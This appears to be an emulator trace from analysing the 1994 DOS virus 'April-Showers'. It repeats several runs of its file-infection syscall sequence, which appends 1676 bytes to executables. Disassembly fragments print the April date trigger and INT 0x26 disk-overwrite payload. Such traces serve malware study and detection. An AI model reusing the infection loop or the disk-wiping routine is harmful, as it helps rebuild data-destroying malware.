2018-12-25T12:28:51.484925943Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.4869377Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.496731028Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.507891138Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.51129315Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.519430584Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.527167714Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.530156357Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.536330446Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.542335871Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.545726111Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.548469947Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.552371325Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.562174005Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.564459505Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.567778527Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.573558995Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.576874549Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.585544813Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.59336504Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.595801182Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.607982761Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.615797501Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.619433385Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.622308735Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.626289469Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.637691112Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.640790277Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.6505227Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.662336652Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.665931575Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.675056081Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.682614583Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.685140726Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.697180469Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.708820812Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.712036416Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.714956917Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.719972006Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.731398043Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.73431067Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.743451103Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.755285229Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.759491242Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:51.764965705Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:51.767926076Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:51.770323889Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:51.774807953Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:51.156292749Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:51.15769266Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:51.160156917Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:51.164422435Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:51.173471991Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:51.176956847Z	62	PC: 12e49 | Close file
2018-12-25T12:28:51.179092613Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.182301498Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:51.189655164Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.19848842Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.206135935Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.209402598Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:51.229367288Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.238372179Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:51.244831223Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:51.248945835Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:51.2529775Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:51.265895917Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:51.267862443Z	62	PC: 12f4d | Close file
2018-12-25T12:28:51.284271108Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.301670876Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.305140943Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.314415103Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.322464765Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.324918937Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.336756577Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.345462222Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.34933038Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.351351882Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.355027658Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.366214589Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.368463694Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.377779174Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.389562984Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.392833596Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.40027487Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.408370389Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.410917978Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.422678953Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.430637353Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.433885617Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.435854418Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.440214965Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.450620703Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.452330826Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.461780853Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.472524871Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.475347447Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.482836475Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.487673593Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.489273276Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.496470771Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.505354029Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.508890424Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.510874353Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.515391889Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.525345395Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.526907457Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.535645166Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.546370212Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.549184679Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.556921497Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.564326912Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.566273466Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.571711201Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.576835746Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.580045593Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.582829886Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.58625678Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.595524473Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.597222274Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.599603072Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.604403974Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.607364421Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.615299856Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.622475068Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.624561816Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.636743476Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.645223496Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.64844253Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.650679045Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.653814097Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.664129479Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.666873336Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.675706981Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.686651586Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.690034257Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.698238228Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.705447807Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.708062159Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.720112376Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.727949319Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.731508051Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.734612076Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.738197386Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.748807746Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.751863835Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.760518604Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.771805719Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.775870386Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:51.781276801Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:51.784114525Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:51.787263323Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:51.790490877Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:51.289863132Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:51.291513813Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:51.293654909Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:51.299217229Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:51.312048529Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:51.318691987Z	62	PC: 12e49 | Close file
2018-12-25T12:28:51.320406798Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.322856279Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:51.32857694Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.334804604Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.340765489Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.343411274Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:51.95316241Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.964877773Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:51.969593815Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:51.97144754Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:51.975307462Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:51.985791306Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:51.987656816Z	62	PC: 12f4d | Close file
2018-12-25T12:28:51.995320341Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.005703529Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.008725904Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.015651449Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.023512512Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.025363981Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.035803166Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.04416831Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.04694119Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.048978527Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.06259133Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.071886968Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.073502456Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.086046451Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.09603823Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.09914212Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.106652483Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.11338135Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.115616091Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.126566485Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.13442992Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.13754006Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.139592227Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.143462409Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.157908251Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.159735752Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.168416029Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.178182661Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.181080863Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.189351989Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.195837151Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.198002026Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.208985519Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.216116227Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.219146362Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.221529872Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.224935583Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.233971422Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.235761095Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.244490383Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.254720852Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.25762753Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.265337234Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.271757926Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.273811162Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.278581192Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.283029655Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.285536157Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.287685369Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.290349412Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.298574378Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.300571Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.302500536Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.306781472Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.309814944Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.32127397Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.327482197Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.330106666Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.339455967Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.345853294Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.349519878Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.350855528Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.353517773Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.363335065Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.36507756Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.372654935Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.383956906Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.386793868Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.393370282Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.406531298Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.41120393Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.422184462Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.432171411Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.434973679Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.437169798Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.44091537Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.451524361Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.453131301Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.460632057Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.475436317Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.478195075Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:52.482677204Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:52.486085122Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:52.488199812Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:52.491547684Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:51.353465426Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:51.355461313Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:51.358321264Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:51.364167009Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:51.377194776Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:51.383547593Z	62	PC: 12e49 | Close file
2018-12-25T12:28:51.385155953Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.388972628Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:51.395375303Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.401661905Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.407712885Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.40965604Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:51.95309755Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.959836117Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:51.963905215Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:51.965851298Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:51.969849295Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:51.980442173Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:51.982304778Z	62	PC: 12f4d | Close file
2018-12-25T12:28:51.990254355Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.001057645Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.003735062Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.01041412Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.019265166Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.021137996Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.031063258Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.042699128Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.044625142Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.045937388Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.047867735Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.054067286Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.055265965Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.061000926Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.068024839Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.070061584Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.076563763Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.083939764Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.085908111Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.096477163Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.103799374Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.10685024Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.108179445Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.112846509Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:52.121646311Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:52.123969896Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:52.132296348Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.14238605Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:52.145322961Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.152097072Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:52.15937697Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:52.161482816Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:52.171265445Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:52.178923706Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:52.181945591Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:52.183642286Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:52.187822518Z	64	PC: 13413 | Write file or device (See above)
